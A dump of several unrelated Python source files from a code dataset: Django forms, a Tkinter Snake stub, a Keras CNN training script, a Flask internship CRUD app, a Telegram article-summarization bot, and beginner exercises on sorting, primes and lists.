Officials\n fields = ['first_name', 'last_name',\n 'date_of_birth', 'address',\n 'phone_number']\n\n\nclass OfficialsCreationForm(forms.ModelForm):\n image = forms.ImageField(max_length=255, label='Photo')\n x1 = forms.IntegerField(min_value=0, widget=forms.HiddenInput, initial=0)\n x2 = forms.IntegerField(min_value=0, widget=forms.HiddenInput, initial=0)\n y1 = forms.IntegerField(min_value=0, widget=forms.HiddenInput, initial=0)\n y2 = forms.IntegerField(min_value=0, widget=forms.HiddenInput, initial=0)\n\n class Meta:\n model = Officials\n fields = ['first_name', 'last_name', 'role',\n 'date_of_birth', 'address', 'phone_number',\n 'occupation']\n\n widgets = {\n 'role': forms.HiddenInput(),\n }\n\n\nclass PlayerCreationForm(OfficialsCreationForm):\n height = forms.IntegerField(\n required=True, min_value=100, max_value=200,\n help_text=\"Height in Centimeters\")\n weight = forms.IntegerField(\n required=True, help_text=\"Weight in Kilograms\")\n prefered_foot = forms.ChoiceField(\n choices=[('', '---'), ]+PlayerInfo.foot_choices, required=True)\n favorite_position = forms.ChoiceField(\n choices=[('', '---'), ]+PlayerInfo.position_choices, required=True)\n address_proof = forms.ImageField(help_text=\"Document for address proof\")\n age_proof = forms.ImageField(help_text=\"Documents for age proof\")\n\n\nclass LinkPlayerForm(forms.ModelForm):\n class Meta:\n model = Invitations\n fields = ['player', 'profile']\n\n widgets = {\n 'profile': forms.HiddenInput(),\n }\n\n def __init__(self, club, *args, **kwargs):\n super().__init__(*args, **kwargs)\n Users = get_user_model()\n self.fields['player'].queryset = Users.objects.filter(\n Official__isnull=True).filter(\n club__isnull=True).filter(\n is_staff=False).filter(\n email_verified=True).exclude(\n invitations__club=club)\n\n\nclass abbrForm(forms.ModelForm):\n class Meta:\n model = ClubDetails\n fields = ['abbr', ]\n\n\nclass clubDetailsForm(forms.ModelForm):\n\n class Meta:\n model = ClubDetails\n fields = ['address', 'contact_number', 'date_of_formation']\n","repo_name":"prajeeshag/VFF","sub_path":"registration/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":7188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13070622888","text":"#!/bin/env python\nfrom Tkinter import *\n\nclass Snake(Tk):\n def __init__(self):\n WIDTH=300\n HEIGHT=300\n \n Tk.__init__(self)\n\n self.title(\"Snake\")\n\n self.canvas = Canvas(self, width=WIDTH, height=HEIGHT, bg=\"white\")\n self.canvas.grid(columnspan=3)\n self.canvas.focus_set()\n self.canvas.bind(\"\", self.create)\n self.canvas.bind(\"\", self.create)\n\n newGame = Button(self, text=\"New Game\", command=self.new_game)\n newGame.grid(row=1, column=0, sticky=E)\n\n self.score_label = Label(self)\n self.score_label.grid(row=1, column=1)\n\n self.score_label = Label(self)\n self.score_label.grid(row=1, column=2)\n\n self.new_game()\n self.redraw()\n\n def new_game(self):\n self.lives = 3\n self.score = 0\n self.mainloop()\n\n def redraw(self):\n self.score_label.text=\"00000\"\n\n def create(self, origin):\n pass\n\nif __name__ == '__main__':\n Snake()\n","repo_name":"tkentrich/Python","sub_path":"Tkinter/SnakeGame.py","file_name":"SnakeGame.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23790775918","text":"#coding:utf-8\r\n \r\nimport random \r\nimport numpy as np\r\nimport math\r\nimport h5py\r\nimport 
time\r\nimport os\r\nfrom six.moves import range \r\nimport pickle\r\nimport sys\r\nfrom keras.callbacks import EarlyStopping\r\nfrom keras.callbacks import Callback\r\nfrom keras.preprocessing.sequence import * \r\nfrom keras.models import Sequential \r\nfrom keras.layers.core import Dense, Dropout, Activation, Flatten \r\nfrom keras.layers.advanced_activations import PReLU \r\nfrom keras.layers.convolutional import Conv2D, MaxPooling2D\r\nfrom keras.optimizers import SGD, Adadelta, Adagrad \r\nfrom keras.utils import np_utils, generic_utils \r\nimport matplotlib.pyplot as plt \r\nfrom keras import backend\r\nfrom keras.models import load_model\r\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\r\nclass LossHistory(Callback):\r\n def on_train_begin(self, logs={}):\r\n self.losses = {'batch':[], 'epoch':[]}\r\n self.accuracy = {'batch':[], 'epoch':[]}\r\n self.val_loss = {'batch':[], 'epoch':[]}\r\n self.val_acc = {'batch':[], 'epoch':[]}\r\n\r\n def on_batch_end(self, batch, logs={}):\r\n self.losses['batch'].append(logs.get('loss'))\r\n self.accuracy['batch'].append(logs.get('acc'))\r\n self.val_loss['batch'].append(logs.get('val_loss'))\r\n self.val_acc['batch'].append(logs.get('val_acc'))\r\n\r\n def on_epoch_end(self, batch, logs={}):\r\n self.losses['epoch'].append(logs.get('loss'))\r\n self.accuracy['epoch'].append(logs.get('acc'))\r\n self.val_loss['epoch'].append(logs.get('val_loss'))\r\n self.val_acc['epoch'].append(logs.get('val_acc'))\r\n\r\n def loss_plot(self, loss_type,fig_name):\r\n iters = range(len(self.losses[loss_type]))\r\n plt.figure()\r\n plt.plot(iters, self.accuracy[loss_type], 'r', label='train acc')\r\n plt.plot(iters, self.losses[loss_type], 'g', label='train loss')\r\n if loss_type == 'epoch':\r\n plt.plot(iters, self.val_acc[loss_type], 'b', label='val acc')\r\n plt.plot(iters, self.val_loss[loss_type], 'k', label='val loss')\r\n plt.grid(True)\r\n plt.xlabel(loss_type)\r\n plt.ylabel('acc-loss')\r\n plt.legend(loc=\"upper right\")\r\n plt.savefig(fig_name+'.jpg')\r\n plt.close()\r\n\r\ndef make_noise(train_label,precent,seed_ini):\r\n noise_label= train_label.copy()\r\n total = np.shape(train_label)[0]\r\n noise_lines = random.sample(range(seed_ini,total),int(total*float(precent)))\r\n for i in noise_lines:\r\n label_list = [0,1,2]\r\n label_list.remove(train_label[i])\r\n noise_label[i] = random.choice(label_list)\r\n return noise_label\r\n\r\n\r\ndef add_layers(model):\r\n\r\n model.add(Conv2D(8, (3, 5), padding=\"valid\", kernel_initializer=\"uniform\", weights=None, input_shape=(100,200,3)) )\r\n model.add(Activation('relu'))\r\n\r\n model.add(Conv2D(8,(3,5),padding=\"valid\")) \r\n model.add(Activation('relu'))\r\n model.add(MaxPooling2D(pool_size=(2, 4)))\r\n model.add(Dropout(0.2))\r\n \r\n model.add(Conv2D(16,(3,3), padding=\"valid\"))\r\n model.add(Activation('relu')) \r\n model.add(MaxPooling2D(pool_size=(2, 2)))\r\n model.add(Dropout(0.2))\r\n\r\n model.add(Flatten()) \r\n model.add(Dense(64, kernel_initializer=\"normal\"))\r\n model.add(Activation('relu'))\r\n\r\n model.add(Dense(3, kernel_initializer=\"normal\")) \r\n model.add(Activation('softmax')) \r\n model.summary() \r\n\r\n list_lr=float(sys.argv[5])\r\n sgd = SGD(lr=list_lr, decay=0.00001, momentum=0.1, nesterov=False)\r\n model.compile(loss='categorical_crossentropy', metrics=['accuracy'],optimizer=sgd)\r\n return model\r\n\r\ndef train(model,X_train,train_label,list_batch,list_epoch, threshod):\r\n model = add_layers(model)\r\n history = LossHistory()\r\n seed = X_train[:200]\r\n seed_l = 
train_label[:200]\r\n rest = X_train\r\n rest_l = train_label\r\n exists = [0 for i in X_train]\r\n for i in range(200):\r\n exists[i]=1\r\n\r\n model.fit(seed,seed_l, batch_size=list_batch, epochs=list_epoch,shuffle=False,verbose=2,validation_split=0.15,callbacks=[history])\r\n stop=0\r\n while stop==0:\r\n rest_res = model.predict(rest)\r\n candidates = [max(i) for i in rest_res]\r\n print('||||||||||||||||||||||||||||||||||||||||||||')\r\n print(max(candidates))\r\n print(min(candidates))\r\n candidates_l = list(rest_res.argmax(axis=1))\r\n stop_tmp=0\r\n for index in range(len(candidates)):\r\n if candidates_l[index] == list(rest_l[index]).index(1) and candidates[index] > threshod and exists[index]==0 : \r\n tmp = np.empty([1,100,200,3])\r\n tmp[0] = rest[index]\r\n seed = np.concatenate((seed, tmp))\r\n tmp = np.empty([1,3])\r\n tmp[0] = rest_l[index] \r\n seed_l = np.concatenate((seed_l,tmp))\r\n exists[index]=1 \r\n stop_tmp=1\r\n if stop_tmp==0:\r\n stop=1\r\n else:\r\n model.fit(seed,seed_l, batch_size=list_batch, epochs=list_epoch,shuffle=False,verbose=2,validation_split=0.15)\r\n return model,history \r\n\r\ndef test(result,test_label):\r\n\r\n j_0_0 = 0\r\n j_0_1 = 0\r\n j_0_2 = 0\r\n j_1_0 = 0\r\n j_1_1 = 0\r\n j_1_2 = 0\r\n j_2_0 = 0\r\n j_2_1 = 0\r\n j_2_2 = 0\r\n\r\n for i,pred in enumerate(list(result)):\r\n res = list(pred)\r\n label = test_label[i]\r\n label_pred = res.index(max(res))\r\n\r\n if label==0 and label_pred == 0:\r\n j_0_0+=1\r\n elif label==0 and label_pred == 1:\r\n j_0_1+=1\r\n elif label==0 and label_pred == 2:\r\n j_0_2+=1\r\n elif label==1 and label_pred == 0:\r\n j_1_0+=1\r\n elif label==1 and label_pred == 1:\r\n j_1_1+=1\r\n elif label==1 and label_pred == 2:\r\n j_1_2+=1\r\n elif label==2 and label_pred == 0:\r\n j_2_0+=1\r\n elif label==2 and label_pred == 1:\r\n j_2_1+=1\r\n elif label==2 and label_pred == 2:\r\n j_2_2+=1\r\n\r\n print(\"j_0_0 = \" + str(j_0_0))\r\n print(\"j_0_1 = \" + str(j_0_1))\r\n print(\"j_0_2 = \" + str(j_0_2))\r\n print(\"j_1_0 = \" + str(j_1_0))\r\n print(\"j_1_1 = \" + str(j_1_1))\r\n print(\"j_1_2 = \" + str(j_1_2))\r\n print(\"j_2_0 = \" + str(j_2_0))\r\n print(\"j_2_1 = \" + str(j_2_1))\r\n print(\"j_2_2 = \" + str(j_2_2))\r\n\r\n\r\n\r\ndef main():\r\n\r\n # loading data-----------------------------------------------------------------------------------\r\n\r\n t0=time.time()\r\n X_train= pickle.load( open(sys.argv[1], 'rb'))\r\n #X_train_right = pickle.load( open(sys.argv[2], 'rb'))\r\n train_label = pickle.load( open(sys.argv[2], 'rb'))\r\n noise = sys.argv[3]\r\n noise_label = make_noise(train_label,noise,200)\r\n list_lr=float(sys.argv[4])\r\n list_batch=int(sys.argv[5])\r\n list_epoch=int(sys.argv[6])\r\n X_test = pickle.load( open(sys.argv[7], 'rb'))\r\n #X_test_right = pickle.load( open(sys.argv[9], 'rb'))\r\n test_label = pickle.load( open(sys.argv[8], 'rb'))\r\n\r\n model_name='cnn_cover'+'_'+sys.argv[3]+'_'+str(list_lr)+'_'+str(list_batch)+'_'+str(list_epoch)\r\n #right_model_name='cnn_right'+'_'+sys.argv[4]+'_'+str(list_lr)+'_'+str(list_batch)+'_'+str(list_epoch)\r\n t1=time.time()\r\n print (\"loading data uses time: \"+str(t1-t0))\r\n\r\n noise_label = np_utils.to_categorical(noise_label,3) \r\n print('Build model...')\r\n model = Sequential() \r\n threshod = 0.8\r\n model,history = train(model,X_train,noise_label,list_batch,list_epoch, threshod)\r\n model.save(''+ model_name+'.h5')\r\n \r\n result = model.predict(X_test)\r\n test(result,test_label)\r\n \r\nif __name__ == '__main__':\r\n 
main()\r\n\r\n","repo_name":"BRF123/Cnngeno","sub_path":"TRAIN_TEST_CNN/3.train_cnn_boot.py","file_name":"3.train_cnn_boot.py","file_ext":"py","file_size_in_byte":7651,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"15988998379","text":"\"\"\"Sequence V\"\"\"\n\n\ndef seq5(number):\n \"seq5 with 7\"\n countfor7 = 0\n for counting in range(number, 0, -1):\n print(counting, end=\" \")\n countfor7 += 1\n if countfor7 == 7:\n print(\"\")\n countfor7 = 0\n\n\nseq5(int(input()))\n","repo_name":"ExxiDauS/PSCP-Y1S1","sub_path":"Week 4/Sequence V.py","file_name":"Sequence V.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73377022913","text":"from flask import Flask, render_template, request, redirect, url_for\r\nfrom data import *\r\n\r\napp = Flask(__name__)\r\n\r\n@app.route('/')\r\ndef index():\r\n return render_template('index.html')\r\n\r\n@app.route('/internships/')\r\ndef internships(program_type):\r\n programs_list = read_programs_by_program_type(program_type)\r\n return render_template(\"internship.html\", program_type=program_type, programs=programs_list)\r\n\r\n@app.route('/internships/')\r\ndef program(program_id):\r\n program = read_programs_by_program_type(program_id)\r\n return render_template(\"program.html\",program=program)\r\n\r\n\r\n@app.route('/register')\r\ndef register():\r\n return render_template('register.html')\r\n\r\n@app.route('/processed', methods=['post'])\r\ndef processing():\r\n program_data = {\r\n \"program_type\": request.form['program_type'],\r\n \"program_name\": request.form['program_name'],\r\n \"salary\": request.form['program_salary'],\r\n \"duration\": request.form['program_duration'],\r\n \"description\": request.form['program_desc'],\r\n \"url\": request.form['program_url']\r\n }\r\n insert_program(program_data)\r\n return redirect(url_for('internships', program_type=request.form['program_type']))\r\n\r\n\r\n@app.route('/modify', methods=['post'])\r\ndef modify():\r\n # 1. 
identify whether user clicked edit or delete\r\n # if edit, then do this:\r\n if request.form[\"modify\"] == \"edit\":\r\n # retrieve record using id\r\n program_id = request.form[\"program_id\"]\r\n program = read_programs_by_program_type(program_id)\r\n # update record with new data\r\n return render_template('update.html', program=program)\r\n # if delete, then do this\r\n elif request.form[\"modify\"] == \"delete\":\r\n # retrieve record using id\r\n program_id = request.form[\"program_id\"]\r\n program = read_programs_by_program_type(program_id)\r\n # delete the record\r\n delete_program(program_id)\r\n # redirect user to program list by program type\r\n return redirect(url_for(\"internships\", program_type=program[\"program_type\"]))\r\n\r\n@app.route('/update', methods=['post'])\r\ndef update():\r\n program_data = {\r\n \"program_id\" : request.form[\"program_id\"],\r\n \"program_type\": request.form['program_type'],\r\n \"program_name\": request.form['program_name'],\r\n \"salary\": request.form['program_salary'],\r\n \"duration\": request.form['program_duration'],\r\n \"description\": request.form['program_desc'],\r\n \"url\": request.form['program_url']\r\n }\r\n update_program(program_data)\r\n return redirect(url_for('program',program_id = request.form['program_id']))\r\n\r\ndef delete_program(program_id):\r\n conn, cur = connect_to_db(db_path)\r\n query = \"DELETE FROM programs WHERE id = ?\"\r\n values = (program_id,)\r\n cur.execute(query, values)\r\n conn.commit()\r\n conn.close()\r\n\r\nif __name__ == \"__main__\":\r\n app.run(debug=True)","repo_name":"jtfidelis/choose-an-internship","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28743329531","text":"import asyncio\nimport logging\nimport nltk\nfrom telegram import Update\nfrom telegram.ext import ApplicationBuilder, ContextTypes, CommandHandler, filters, MessageHandler\n\nfrom transformers import AutoTokenizer, AutoModelForSeq2SeqLM\nfrom transformers import pipeline\n\nfrom goose3 import Goose\nimport torch\n\nfrom nltk.tokenize import sent_tokenize, word_tokenize\nfrom time import perf_counter\n\n\nsummarizer = \"\"\n\nlogging.basicConfig(\n format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',\n level=logging.DEBUG\n)\n\nlogging.getLogger('apscheduler').setLevel(logging.WARNING)\nlogging.getLogger('telegram._bot').setLevel(logging.WARNING)\nlogging.getLogger('httpx._client').setLevel(logging.WARNING)\nlogging.getLogger('telegram.ext._application').setLevel(logging.WARNING)\nlogging.getLogger('urllib3.connectionpool').setLevel(logging.WARNING)\n\nasync def start(update: Update, context: ContextTypes.DEFAULT_TYPE):\n await context.bot.send_message(chat_id=update.effective_chat.id, text=\"I'm a Summary bot, Send me text for summarization.\")\n\nasync def createSummary(update: Update, context: ContextTypes.DEFAULT_TYPE):\n inputText=update.message.text \n logging.debug( f\"Received Mesage from {update.effective_chat.id}\\n\\t {inputText}\")\n await context.bot.send_message(chat_id=update.effective_chat.id, text=\"Processing...\")\n summary = await getSummary(inputText)\n \n logging.debug( f\"Summary\\n\\t{summary}\")\n await context.bot.send_message(chat_id=update.effective_chat.id, text=summary, device = 1)\n\nasync def getSummary(inputText):\n inputTextLength = len(inputText)\n summaryMaxLength = min(int(inputTextLength/2), 300)\n summaryMinLenght= 
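# The Flask app above pulls insert_program, update_program, read_programs_by_program_type,
# connect_to_db and db_path from data.py, which is not shown. A minimal sketch of what
# update_program could look like, in the same parameterized-query style as the local
# delete_program (the column names are assumptions, not the real schema):
def update_program(program_data):
    conn, cur = connect_to_db(db_path)  # helper assumed to come from data.py
    query = ("UPDATE programs SET program_type = ?, program_name = ?, salary = ?, "
             "duration = ?, description = ?, url = ? WHERE id = ?")
    values = (program_data["program_type"], program_data["program_name"],
              program_data["salary"], program_data["duration"],
              program_data["description"], program_data["url"],
              program_data["program_id"])
    cur.execute(query, values)
    conn.commit()
    conn.close()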
min(int(summaryMaxLength/2), 200)\n\n t1_start = perf_counter()\n\n summaryObject = summarizer(inputText, max_length=summaryMaxLength, min_length=summaryMinLenght, do_sample=False)\n t1_stop = perf_counter()\n logging.info(f\"Duration: {t1_stop - t1_start}\")\n\n summary = summaryObject[0]['summary_text']\n return summary\n\nasync def parseUrl(update: Update, context: ContextTypes.DEFAULT_TYPE):\n asyncio.create_task(\n processParseUrl(update, context))\n\nasync def processParseUrl(update: Update, context: ContextTypes.DEFAULT_TYPE):\n url = update.message.text.removeprefix('/url ')\n logging.debug( f\"Received URL from {update.effective_chat.id}\\n\\t {url}\")\n g = Goose()\n article = g.extract(url=url)\n await context.bot.send_message(chat_id=update.effective_chat.id, text=f\"Processing '{article.title}'\")\n\n article = article.cleaned_text\n sentences = sent_tokenize(article)\n \n batches = []\n currentBatchSize = 0;\n batch = ''\n for sentence in sentences:\n if(len(sentence) >= 1024):\n continue\n if(currentBatchSize + len(sentence) + 1 < 1024):\n batch = batch + ' ' + sentence\n currentBatchSize += len(sentence) + 1\n else:\n batches.append(batch)\n batch = sentence\n currentBatchSize = len(batch)\n\n summaries = []\n for batch in batches:\n summary = await getSummary(batch)\n summaries.append(summary)\n \n for summary in summaries:\n await context.bot.send_message(chat_id=update.effective_chat.id, text=summary)\n\n await context.bot.send_message(chat_id=update.effective_chat.id, text=\"Done.\")\n\nif __name__ == '__main__':\n logging.debug( f\"Models Initialization...\")\n #tokenizer = AutoTokenizer.from_pretrained(\"facebook/bart-large-cnn\")\n #model = AutoModelForSeq2SeqLM.from_pretrained(\"facebook/bart-large-cnn\")\n \n summarizer = pipeline(\"summarization\", model=\"facebook/bart-large-cnn\", device=torch.cuda.current_device())\n \n logging.debug( f\"Initialized.\")\n \n application = ApplicationBuilder().token('< Telegram bot tocken >').build()\n start_handler = CommandHandler('start', start)\n application.add_handler(start_handler)\n\n # parseUrl_handler = CommandHandler('url', parseUrl)\n # application.add_handler(parseUrl_handler)\n\n echo_handler = MessageHandler(filters.TEXT & (~filters.COMMAND), parseUrl)\n application.add_handler(echo_handler)\n\n application.run_polling()","repo_name":"Pomoinytskyi/NewsFeed","sub_path":"source/TelegramBot/TelegramBot.py","file_name":"TelegramBot.py","file_ext":"py","file_size_in_byte":4162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41148598031","text":"from itertools import product\n\ntest_dict = {'month': [1, 2, 3], 'name': ['Jan', 'Feb', 'March']}\n\nprint(\"The original dictionary is : \" + str(test_dict))\n\nres = dict(zip(test_dict['month'], test_dict['name']))\n\nprint(\"Flattened dictionary : \" + str(res))\n\n\ndef UncommonWords(A, B):\n\n count = {}\n\n for word in A.split():\n count[word] = count.get(word, 0) + 1\n\n for word in B.split():\n count[word] = count.get(word, 0) + 1\n\n return [word for word in count if count[word] == 1]\n\n\nA = \"Geeks for Geeks\"\nB = \"Learning from Geeks for Geeks\"\n\nprint(UncommonWords(A, B))\n\nprint(\"1) Fibonacci Sequence\")\n\n\ndef fibonacci(n):\n if n == 0 or n == 1:\n return n\n else:\n return fibonacci(n - 1) + fibonacci(n - 2)\n\n\nprint(fibonacci(5))\n\nprint(\"2) Factorial of Number\")\n\n\ndef factorial(n):\n if n == 1:\n return 1\n ans = n * factorial(n - 1)\n return 
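# Two fixes worth noting in the Telegram summarizer above: createSummary() passes a
# `device` keyword that bot.send_message does not accept, and processParseUrl() never
# appends the final partial batch after its packing loop, silently dropping the tail
# of every article. A standalone sketch of the batching with the trailing batch kept
# (the 1024-character limit mirrors the original):
def batch_sentences(sentences, limit=1024):
    """Greedily pack sentences into batches shorter than `limit` characters."""
    batches, batch, size = [], "", 0
    for sentence in sentences:
        if len(sentence) >= limit:
            continue  # a single oversized sentence can never fit
        if size + len(sentence) + 1 < limit:
            batch = (batch + " " + sentence).strip()
            size += len(sentence) + 1
        else:
            batches.append(batch)
            batch, size = sentence, len(sentence)
    if batch:
        batches.append(batch)  # keep the final partial batch
    return batches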
ans\n\n\nprint(factorial(5))\n\nprint(\"3) Printing lists\")\n\nl = [1, 5, 10, 15, 20, 25, 30]\n\nodd_elements = l[1::2]\nprint(odd_elements)\n\neven_elements = l[0::2]\nprint(even_elements)\n\nprint(\"4) Find occurence of each element\")\n\nsample_list = [11, 25, 23, 35, 11, 25, 45, 60]\n\ncount_dict = dict()\n\nfor item in sample_list:\n if item in count_dict:\n count_dict[item] += 1\n else:\n count_dict[item] = 1\n\nprint(count_dict)\n\narr = [9, 8, 7, 6, 5, 4, 3, 2, 1]\nprint(\"5) Bubble Sort\")\n\n\ndef bubble_sort(arr):\n n = len(arr)\n for iter_num in range(n):\n for current in range(n - 1 - iter_num):\n if arr[current] > arr[current + 1]:\n arr[current], arr[current + 1] = arr[current + 1], arr[current]\n\n\nbubble_sort(arr)\nprint(arr)\n\n\ndef select_sort(arr):\n n = len(arr)\n for iter_num in range(n):\n min_index = iter_num\n for current in range(iter_num + 1, n):\n if arr[current] < arr[min_index]:\n min_index = current\n arr[min_index], arr[iter_num] = arr[iter_num], arr[min_index]\n\n\nselect_sort(arr)\nprint(arr)\n\nprint(\"6) Natural numbers\")\ni = 1\nwhile i <= 10:\n print(i)\n i += 1\n\nprint(\"7) Sum of numbers\")\nsum = 0\n# n = int(input(\"Enter num \"))\nn = 10\n\nfor i in range(1, n + 1, 1):\n sum += i\nprint(sum)\n\nprint(\"8) Number pattern\")\n\nrow = 5\nfor i in range(1, row + 1, 1):\n for j in range(1, i + 1):\n print(j, end=' ')\n print(\" \")\n\nprint(\"Print pattern\")\n\nfor num in range(10):\n for i in range(num):\n print(num, end=\" \")\n print(\"\\n\")\n\nprint(\"Asterick pattern\")\n\nfor i in range(6, 0, -1):\n for j in range(0, i - 1):\n print(\"*\", end=' ')\n print(\" \")\n\nprint(\"Add list to set\")\n\nsample_set = {\"Yellow\", \"Orange\", \"Black\"}\nsample_list = [\"Blue\", \"Green\", \"Red\"]\n\nsample_set.update(sample_list)\nprint(sample_set)\n\nprint(\"Identical numbers in two sets\")\n\nset1 = {10, 20, 30, 40, 50}\nset2 = {30, 40, 50, 60, 70}\n\nprint(set1.intersection(set2))\n\nprint(\"Update set if element does not exist\")\n\nset1 = {10, 20, 30}\nset2 = {20, 40, 50}\n\nset1.difference_update(set2)\nprint(set1)\n\nprint(\"Print list in reverse\")\nlist1 = [10, 20, 30, 40, 50]\n\nsize = len(list1) - 1\nfor i in range(size, -1, -1):\n print(list1[i])\n\nprint(\"New Pattern\")\n\nrows = 5\nfor i in range(0, rows):\n for j in range(0, i + 1):\n print(\"*\", end=' ')\n print(\"\\r\")\n\nfor i in range(rows, 0, -1):\n for j in range(0, i - 1):\n print(\"*\", end=' ')\n print(\"\\r\")\n\n\ndef rotateArray(arr, n, d):\n temp = []\n i = 0\n while (i < d):\n temp.append(arr[i])\n i = i + 1\n i = 0\n while (d < n):\n arr[i] = arr[d]\n i = i + 1\n d = d + 1\n arr[:] = arr[:i] + temp\n return arr\n\n\narr = [1, 2, 3, 4, 5, 6, 7]\nprint(\"Array after left rotation is: \", end=' ')\nprint(rotateArray(arr, len(arr), 2))\n\n\ndef splitArr(arr, n, k):\n for i in range(0, k):\n x = arr[0]\n for j in range(0, n - 1):\n arr[j] = arr[j + 1]\n\n arr[n - 1] = x\n\n\n# main\narr = [12, 10, 5, 6, 52, 36]\nn = len(arr)\nposition = 2\n\nsplitArr(arr, n, position)\n\nfor i in range(0, n):\n print(arr[i], end=' ')\n\n\ndef dedupe_v1(x):\n y = []\n for i in x:\n if i not in y:\n y.append(i)\n return y\n\n\ndef dedupe_v2(x):\n return list(set(x))\n\n\na = [1, 2, 3, 4, 3, 2, 1]\nprint(dedupe_v1(a))\nprint(dedupe_v2(a))\n\n\ndef swapList(newList):\n size = len(newList)\n\n temp = newList[0]\n newList[0] = newList[size - 1]\n newList[size - 1] = temp\n\n return newList\n\n\nnewList = [12, 35, 9, 56, 24]\n\nprint(swapList(newList))\n\n\ndef swapPositions(list, pos1, 
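# rotateArray and splitArr above rotate left in O(n*d) by shifting elements one step
# at a time; slicing gives the same left rotation in one step:
def rotate_left(arr, d):
    if not arr:
        return arr
    d %= len(arr)
    return arr[d:] + arr[:d]

print(rotate_left([1, 2, 3, 4, 5, 6, 7], 2))  # [3, 4, 5, 6, 7, 1, 2]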
pos2):\n\n list[pos1], list[pos2] = list[pos2], list[pos1]\n return list\n\n\n# Driver function\nList = [23, 65, 19, 90]\npos1, pos2 = 1, 3\n\nprint(swapPositions(List, pos1 - 1, pos2 - 1))\n\n\ndef isMonotonic(A):\n\n return (all(A[i] <= A[i + 1] for i in range(len(A) - 1))\n or all(A[i] >= A[i + 1] for i in range(len(A) - 1)))\n\n\nA = [6, 5, 4, 4]\n\nprint(isMonotonic(A))\n\n\ndef simple_interest(p, t, r):\n print('The principal is', p)\n print('The time period is', t)\n print('The rate of interest is', r)\n\n si = (p * t * r) / 100\n\n print('The Simple Interest is', si)\n return si\n\n\nsimple_interest(8, 6, 8)\n\n\ndef compound_interest(principle, rate, time):\n\n # Calculates compound interest\n Amount = principle * (pow((1 + rate / 100), time))\n CI = Amount - principle\n print(\"Compound interest is\", CI)\n\n\n# Driver Code\ncompound_interest(10000, 10.25, 5)\n\n\ndef findArea(r):\n PI = 3.142\n return PI * (r * r)\n\n\n# Driver method\nprint(\"Area is %.6f\" % findArea(5))\n\n\ndef prime(x, y):\n prime_list = []\n for i in range(x, y):\n if i == 0 or i == 1:\n continue\n else:\n for j in range(2, int(i / 2) + 1):\n if i % j == 0:\n break\n else:\n prime_list.append(i)\n return prime_list\n\n\n# Driver program\nstarting_range = 2\nending_range = 7\nlst = prime(starting_range, ending_range)\nif len(lst) == 0:\n print(\"There are no prime numbers in this range\")\nelse:\n print(\"The prime numbers in this range are: \", lst)\n\n\ndef squaresum(n):\n sm = 0\n for i in range(1, n + 1):\n sm = sm + (i * i)\n\n return sm\n\n\nn = 4\n\nimport math\n\n\ndef isPerfectSquare(x):\n s = int(math.sqrt(x))\n return s * s == x\n\n\ndef isFibonacci(n):\n\n return isPerfectSquare(5 * n * n + 4) or isPerfectSquare(5 * n * n - 4)\n\n\nfor i in range(1, 11):\n if (isFibonacci(i) == True):\n print(i, \"is a Fibonacci Number\")\n else:\n print(i, \"is a not Fibonacci Number \")\n\n# Python 3 code to find sum\n# of elements in given array\n\n\ndef _sum(arr):\n sum = 0\n for i in arr:\n sum = sum + i\n\n return (sum)\n\n\narr = []\narr = [12, 3, 4, 15]\n\nn = len(arr)\n\nans = _sum(arr)\n\nprint('Sum of the array is ', ans)\n\n\ndef largest(arr, n):\n\n max = arr[0]\n for i in range(1, n):\n if arr[i] > max:\n max = arr[i]\n return max\n\n\narr = [10, 324, 45, 90, 9808]\nn = len(arr)\nAns = largest(arr, n)\nprint(\"Largest in given array \", Ans)\n\n#\n\n\ndef splitArr(arr, n, k):\n for i in range(0, k):\n x = arr[0]\n for j in range(0, n - 1):\n arr[j] = arr[j + 1]\n\n arr[n - 1] = x\n\n\narr = [12, 10, 5, 6, 52, 36]\nn = len(arr)\nposition = 2\n\nsplitArr(arr, n, position)\n\nfor i in range(0, n):\n print(arr[i], end=' ')\n\ntest_list = [1, 4, 5, 7, 8]\n\nprint(\"The list is : \" + str(test_list))\n\ncounter = 0\nfor i in test_list:\n\n counter = counter + 1\n\nprint(\"Length of list using naive method is : \" + str(counter))\n\nlst = [1, 6, 3, 5, 3, 4]\ni = 7\nif i in lst:\n print(\"exist\")\nelse:\n print(\"not exist\")\n\ntotal = 0\n\nlist1 = [11, 5, 17, 18, 23]\n\nfor ele in range(0, len(list1)):\n total = total + list1[ele]\n\nprint(\"Sum of all elements in given list: \", total)\n\n\ndef multiplyList(myList):\n\n result = 1\n for x in myList:\n result = result * x\n return result\n\n\nlist1 = [1, 2, 3]\nlist2 = [3, 2, 4]\nprint(multiplyList(list1))\nprint(multiplyList(list2))\n\nlist1 = [10, 20, 4, 45, 99]\n\nmx = max(list1[0], list1[1])\nsecondmax = min(list1[0], list1[1])\nn = len(list1)\nfor i in range(2, n):\n if list1[i] > mx:\n secondmax = mx\n mx = list1[i]\n elif list1[i] > secondmax and 
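# prime() above trial-divides every candidate up to i/2; divisors only need checking
# up to sqrt(i), which is much faster on larger ranges (same output, upper bound
# excluded):
def primes_in_range(lo, hi):
    return [n for n in range(max(lo, 2), hi)
            if all(n % d for d in range(2, int(n ** 0.5) + 1))]

print(primes_in_range(2, 7))  # [2, 3, 5]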
